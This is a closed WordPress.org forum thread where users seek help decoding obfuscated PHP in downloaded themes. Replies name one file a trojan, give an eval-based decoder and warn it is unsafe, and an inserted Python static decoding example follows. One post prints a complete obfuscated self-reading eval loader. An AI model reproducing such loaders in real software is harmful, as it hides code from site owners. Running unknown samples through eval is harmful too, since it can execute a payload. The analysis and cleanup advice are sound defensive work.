WordPress.org

[closed] Encrypted Theme? Here's how to decode it. (195 posts)

  1. Claritty
    Member
    Posted 4 years ago #

    hey for some reason, none of the mentioned stuff above seem to be able to decode my footer.php, I wanna put a Donate button there, but I have had no luck with that so far, lol.

    http://wordpress.pastebin.com/m33b76155
    That's my code, any help is greatly appreciated.

  2. gazouteast
    Member
    Posted 4 years ago #

    Hi Otto

    Generally speaking I usually manage to figure things out myself after lots of trial and error, but this one has got me completely beaten.

    http://wordpress.pastebin.com/mc2bad80

    It's the entire contents of a file called validator.php and was accompanied with an encrypted footer which I've decrypted (nothing dangerous) and a checksums.md5 file in which none of the checksums match anything in the code linked above.

    All of them came within the zip package for a theme.

    I'd really appreciate your help decrypting the file above

    Many thanks
    Gaz

  3. Samuel Wood (Otto)
    Tech Ninja
    Posted 4 years ago #

    gazouteast: Delete the file, it's a trojan. I didn't decode it fully, but I did find some contents, including the phrase "I hax0r you", so I'd just get rid of it.

  4. amcobb
    Member
    Posted 4 years ago #

    Hi,

    This is driving me crazy! In addition to this thread, I have read tons of stuff online but I'm confused and must ask for help. I'm sure this is an easy fix that is probably already listed here and I'm just not getting it so I'm hoping someone can help me? Here's the deal....

    I am using a theme from http://www.newwpthemes.com. The BlackPink theme, to be exact. There are links in the footer that I would like to remove. I don't mind giving credit to the author but these are not author related links. If I change the footer, the theme locks me out of admin panel and the site. It throws up a note that says: This theme is released free for use under creative commons licence. All links in the footer should remain intact. These links are all family friendly and will not hurt your site in any way. This great theme is brought to you for free by these supporters.

    There are also static links but I'm not sure all of them need to be removed. I found all of the encrypted code and static links using the TAC plugin. I have copied each of the encrypted codes and the static link information to here: http://wordpress.pastebin.com/m19fa7e24

    Can someone please give me the step by step to get rid of the footer links and then to clean up any of the static links that need to be cleaned up? I think that I probably only need to clean up the first static link that is listed but I would rather let whoever helps me decide about the rest of it.

    Thank you in advance!

    Angelina

  5. Samuel Wood (Otto)
    Tech Ninja
    Posted 4 years ago #

    amcobb: My advice would be to simply not use that theme, or any other themes from that site. They're probably stolen from elsewhere anyway. I'd search for the original theme that they modified to include their spam and use that instead.

    However:

    1. This is a bit of code that displays the theme license message.
    2. This is a bit of code that checks to see if your footer has changed.
    3. Calls #4.
    4. Makes the theme fail if you remove #5 or #6.
    5. Makes the theme fail if you remove #2 or #4.
    6. Checks to make sure the functions.php file is not removed.

    So, if you remove ALL of those encrypted bits, then it should work okay.

  6. amcobb
    Member
    Posted 4 years ago #

    Otto,

    Thank you! It worked fantastically!

    :)
    Angelina

  7. Gady
    Member
    Posted 4 years ago #

    How to decrypt those parts of the theme?
    We here index page and Footer and I would like to decrypt them, or me and tell me how can I decrypt them.
    Thanks in advance!

    This is the index page

    Code removed by mod.

  8. Samuel Wood (Otto)
    Tech Ninja
    Posted 4 years ago #

    Gady: The very first post in this thread contains links to decode the code you specified. Use those automatic decoders instead of posting the code here.

  9. Skedar
    Member
    Posted 4 years ago #

    Don't work for me...

    code removed by mod

    someone help me?

  10. Samuel Wood (Otto)
    Tech Ninja
    Posted 4 years ago #

    Skedar: I just tested it, and that code you posted DOES work with the existing decoder that I put in the first post. Just go to the link and follow the instructions.

    Remember, you're not going to copy and paste the whole thing, only part of it. Read the instructions closely.

  11. Skedar
    Member
    Posted 4 years ago #

    hmm, Ok

    sry man x.x"

  12. gazouteast
    Member
    Posted 4 years ago #

    Hi Otto

    Thanks for the heads-up, I've only just returned to this thread and have deleted the entire theme immediately. Am now running ClamAV over the whole home directory - can you think of anything else I should do just in case?

    Gaz

  13. Samuel Wood (Otto)
    Tech Ninja
    Posted 4 years ago #

    I have a little bit of info on the topic of being hacked here: http://ottodestruct.com/blog/2009/hacked-wordpress-backdoors/

    But the short of it is that you need to look through your files for anything that seems out of place. Hacks like those usually insert backdoors, and a virus scanner isn't going to find those.

  14. Heartlander
    Member
    Posted 4 years ago #

    No problem decoding, but how are we going to REMOVE all instances of the code?
    Wrapping with a start and end footer tag doesn't work on my template.

    This is driving me mad!

  15. Bektor
    Member
    Posted 4 years ago #

    Could you help me pls? I've tried but I can't, sorry, it's my first time

    code removed by mod, use the decoder yourself

  16. Samuel Wood (Otto)
    Tech Ninja
    Posted 4 years ago #

    Bektor: I just tested it, and that code you posted works with the existing decoder that I put in the first post. Just go to the link and follow the instructions.

    Remember, you're not going to copy and paste the whole thing, only part of it. Read the instructions closely.

  17. tonjiboy
    Member
    Posted 4 years ago #

    Otto

    You're obviously a pro when it comes to this and I'm at the end of my rope. I tried using your great decoder for this and it came up with more gibberish so obviously I'm doing something very wrong. I tried the Byterun decoder because it seemed like it followed that format but came up empty. The Base64 decoder just spit out more gibberish. Here's the stuff I'm trying to decode.

    http://wordpress.pastebin.com/m7f347543

    Any help you could give me would be greatly appreciated.

  18. Samuel Wood (Otto)
    Tech Ninja
    Posted 4 years ago #

    @tonjiboy: Yeah, those types of encoding can be quite annoying sometimes.

    Here's the decoded code:
    http://wordpress.pastebin.com/m785f44b8

  19. Samuel Wood (Otto)
    Tech Ninja
    Posted 4 years ago #

    Here's some generic code that should help some people with decoding code similar to the one above by tonjiboy:

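    <?php
    // Read the encoded file that is to be decoded.
    $text = file_get_contents('test.php');
    function generic_eval_decode($input) {
    	// Pass 1: swap eval for echo, run the file, and capture what it prints
    	// (the first decoded layer) instead of letting that layer execute.
    	$altered = str_replace('eval','echo',$input);
    	ob_start();
    	eval ('?>'.$altered);
    	$new = ob_get_contents();
    	ob_end_clean();
    	// Pass 2: put the captured layer in place of the original eval statement,
    	// then repeat the eval-to-echo swap to capture the next layer.
    	$altered = preg_replace('/eval.*;/', $new, $input);
    	$altered = str_replace('eval','echo',$altered);
    	ob_start();
    	eval ('?>'.$altered);
    	$new = ob_get_contents();
    	ob_end_clean();
    	return $new;
    }
    echo generic_eval_decode($text);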

    That will decode a "test.php" file encoded in a similar way to the ones given that many people have a hard time with.

    Note that decoding this way is not particularly safe. The code in question gets partially run, which means that it could do anything. Nevertheless, for simple encoding methods like this one, it'll get you the original code.
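
The safety note above is about the sample being partially run. As an added example (not code from this thread or from the decoder it links to), this Python sketch peels nested eval layers statically, reproducing only a fixed table of PHP decoding calls and never executing the file. The regex, the function names and the sample are constructed here; encodings outside the table (variable function names, custom alphabets) are refused or left unmatched rather than guessed at.

```python
import base64, codecs, re, zlib

# PHP decoding calls reproduced in Python so the sample is never executed.
# Anything outside this table is refused, not guessed at.
DECODERS = {
    "base64_decode": base64.b64decode,
    "gzinflate": lambda b: zlib.decompress(b, -15),  # raw DEFLATE stream
    "gzuncompress": zlib.decompress,                 # zlib-wrapped stream
    "str_rot13": lambda b: codecs.encode(b.decode("latin-1"), "rot13").encode("latin-1"),
    "strrev": lambda b: b[::-1],
}

# Matches: eval( f1( f2( 'literal' ) ) );
LAYER = re.compile(r"eval\s*\(\s*((?:\w+\s*\(\s*)+)(['\"])([^'\"]*)\2[\s)]*;")

def peel_once(src):
    """Statically unwrap one eval(...) layer; return None if none is found."""
    m = LAYER.search(src)
    if m is None:
        return None
    funcs = re.findall(r"\w+", m.group(1))
    unknown = [f for f in funcs if f not in DECODERS]
    if unknown:
        raise ValueError("needs manual analysis, unsupported call(s): %s" % unknown)
    data = m.group(3).encode("latin-1")
    for name in reversed(funcs):  # PHP evaluates the innermost call first
        data = DECODERS[name](data)
    return src[:m.start()] + data.decode("latin-1") + src[m.end():]

def peel_all(src, max_layers=25):
    """Unwrap nested layers until none remain; returns (code, layer_count)."""
    layers = 0
    while layers < max_layers:
        nxt = peel_once(src)
        if nxt is None:
            break
        src, layers = nxt, layers + 1
    return src, layers

def make_sample():
    """Constructed two-layer sample (not taken from any real theme)."""
    inner = 'echo "<p>Theme footer</p>";'
    c = zlib.compressobj(wbits=-15)
    packed = base64.b64encode(c.compress(inner.encode()) + c.flush()).decode()
    layer1 = "eval(gzinflate(base64_decode('%s')));" % packed
    return "<?php eval(base64_decode('%s')); ?>" % base64.b64encode(layer1.encode()).decode()

if __name__ == "__main__":
    print(peel_all(make_sample()))
```

A `ValueError` or a layer count of zero means the file uses an encoding outside the table and needs manual analysis.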

  20. verilix
    Member
    Posted 4 years ago #

    Hey Otto,

    Both my Footer.php and my Index.php are encrypted. I tried all of the encoders here, and spent about 6hrs online trying for a solution, but came up with nothing.

    Footer.php:
    http://wordpress.pastebin.com/m2fe121c

    Index.php:
    http://wordpress.pastebin.com/m2977f406

    Any help you could give me with this would be greatly appreciated!
    Thanks,

  21. Samuel Wood (Otto)
    Tech Ninja
    Posted 4 years ago #

    I tried all of the encoders here

    Clearly, you did not. The very first link in the very first post of this thread is a decoder that works with both of the pieces of code you just posted here.

    Use that decoder. It works.

  22. verilix
    Member
    Posted 4 years ago #

    I did. When I paste in the eval code, it just gives me back the code I placed in.

  23. Samuel Wood (Otto)
    Tech Ninja
    Posted 4 years ago #

    verilix: Did you try actually reading the instructions? They're at the bottom of the page: http://ottodestruct.com/decoder.php

    That site works with your code. I just did it. It gave me the resulting decrypted code. I don't know how I can make this any clearer.

    Hint: "eval" is not what you paste into the box. Read the instructions more carefully.

  24. sigdd
    Member
    Posted 4 years ago #

    Hi Otto -

    May I apologize for my .php ignorance in advance! I'm trying to disable the encryption from footer.php and the code doesn't appear to me to match any of your "if your code looks like this" examples in the first post. Can you direct me?

    The theme seems to have two files that relate to the footer...and I'm too new at this to understand how they are relating. The 'footer.php' code is here: http://wordpress.pastebin.com/f6311dbd

    and the 'footer_content.php' code is here: http://wordpress.pastebin.com/d73a0b57e

    The footer_content file isn't encrypted...just the footer file...but I thought it might be helpful to you to see both and tell me what to do? Not sure how to decode footer and then if I'm able to...what else I might need to do to the file or the related file to accomplish?

    Happy to give the theme creator credit - just want to remove cell phone ad links and put in Google Analytics to the footer! Hope you can help me...thanks in advance!

  25. Samuel Wood (Otto)
    Tech Ninja
    Posted 4 years ago #

    sigdd: You did something wrong, that second link with the footer_content doesn't work.

    The first link is undecipherable, because it's just gibberish. There's no code in there to decode it. Perhaps the second part contains that code, or perhaps there's some other code elsewhere in the theme that decodes it.

    In any case, I'd simply not use that theme. Go find the original theme from the original author. See, most themes with bad code in them like this are stolen from their original sites and then modified. Rarely do spammers like these make their own themes. No real theme author would put spammy cell phone links in their themes.

    Google for the name of theme. You'll probably find it on half a dozen spammy sites. But the original is out there somewhere. Use that one. That's my advice.

  26. phsfboys
    Member
    Posted 4 years ago #

    http://wordpress.pastebin.com/m764a7156

    <?php //
    $OOO0O0O00=__FILE__;$OOO000000=urldecode('%74%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64%66%70%6e%72');$OO00O0000=1136;$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};$O0O0000O0='OOO0000O0';eval(($$O0O0000O0('JE9PME9PMDAwMD0kT09PMDAwMDAwezE3fS4kT09PMDAwMDAwezEyfS4kT09PMDAwMDAwezE4fS4kT09PMDAwMDAwezV9LiRPT08wMDAwMDB7MTl9O2lmKCEwKSRPMDAwTzBPMDA9JE9PME9PMDAwMCgkT09PME8wTzAwLCdyYicpOyRPTzBPTzAwME89JE9PTzAwMDAwMHsxN30uJE9PTzAwMDAwMHsyMH0uJE9PTzAwMDAwMHs1fS4kT09PMDAwMDAwezl9LiRPT08wMDAwMDB7MTZ9OyRPTzBPTzAwTzA9JE9PTzAwMDAwMHsxNH0uJE9PTzAwMDAwMHswfS4kT09PMDAwMDAwezIwfS4kT09PMDAwMDAwezB9LiRPT08wMDAwMDB7MjB9OyRPTzBPTzAwME8oJE8wMDBPME8wMCwxMjg4KTskT08wME8wME8wPSgkT09PMDAwME8wKCRPTzBPTzAwTzAoJE9PME9PMDAwTygkTzAwME8wTzAwLDM4MCksJzNxb016dC84K0ZjeUxkQnNyNkFVU1FYYWZZNHVwRGtJbjBQVFJqd0o5VkNFVzJoWk52aTdPZTFLbG1nSDV4R2I9JywnQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVphYmNkZWZnaGlqa2xtbm9wcXJzdHV2d3h5ejAxMjM0NTY3ODkrLycpKSk7ZXZhbCgkT08wME8wME8wKTs=')));return;?>

    Can someone help me decode the above footer content.
    I tried doing all sort of decoders, but was not able to get the right one.

    I am in urgent need of this. Would be great if someone could help.

    Thanks a million in advance.

  27. sigdd
    Member
    Posted 4 years ago #

    Hi Otto -

    Dang-nabbit. I don't know what I did wrong on the 2nd post, but have reposted in hopes that you'll take a look at it and be able to tell me if the footer is modifiable. I've scoured the net for all sources of the theme -- the first I got off of WordPress's site - but couldn't get the footer off that one either - so then did the one I'm using now. I've customized it a lot in the CSS - so re-doing will be a bear...but I know I might need to. Theme is called 'techified', by the by.

    Would you be willing to look at my repost of footer_content, now CORRECTLY available at http://wordpress.pastebin.com/df858a44 and tell me if you think there is something I can change in there to get rid of all that horrible cell phone junk?

    If it's as big of a mess as the footer - then I'll sadly start the quest for a new theme...but will cross my fingers in the meantime! :)

  28. conorp
    Member
    Posted 4 years ago #

    Hey guys.

    My entire server was infected with this: http://pastebin.com/m7b5d7722

    Any ideas on how to decode it?

  29. Samuel Wood (Otto)
    Tech Ninja
    Posted 4 years ago #

    phsfboys: This is not an exact decoding, as the file included a bunch of annoying newline characters built in and I didn't bother replacing them. It should be enough for you to work with. http://wordpress.pastebin.com/m1af10af9

    sigdd: Still nothing at that link you gave. Dunno what the issue is there.

    conorp: There's nothing there worth decoding, it's just spam. Delete it outright.

  30. brainsplus
    Member
    Posted 4 years ago #

    I was trying to preview my site and all of a sudden I had this message below, I can log into my back office to change anything, how do I resolve this. Here is the message below ...

    Zend Optimizer not installed
    This file was encoded by the Zend Encoder / Zend SafeGuard Suite

    In order to run it, please install the freely available Zend Optimizer, version 2.1.0 or later.

    What is the Zend Optimizer?
    The Zend Optimizer is one of the most popular PHP plugins for performance-improvent, and has been freely available since the early days of PHP 4. It improves performance by taking PHP's intermediate code through multiple Optimization Passes, which replace inefficient code patterns with efficient code blocks. The replacement code blocks perform exactly the same operations as the original code, only faster.

    In addition to performance-improvement, the Zend Optimizer also enables PHP to transparently load files encoded by the Zend Encoder or Zend SafeGuard Suite.

    The Zend Optimizer is a freely-available product from Zend Technologies. Zend Technologies is the company that develops the scripting engine of PHP, also known as the Zend Engine.

Topic Closed

This topic has been closed to new replies.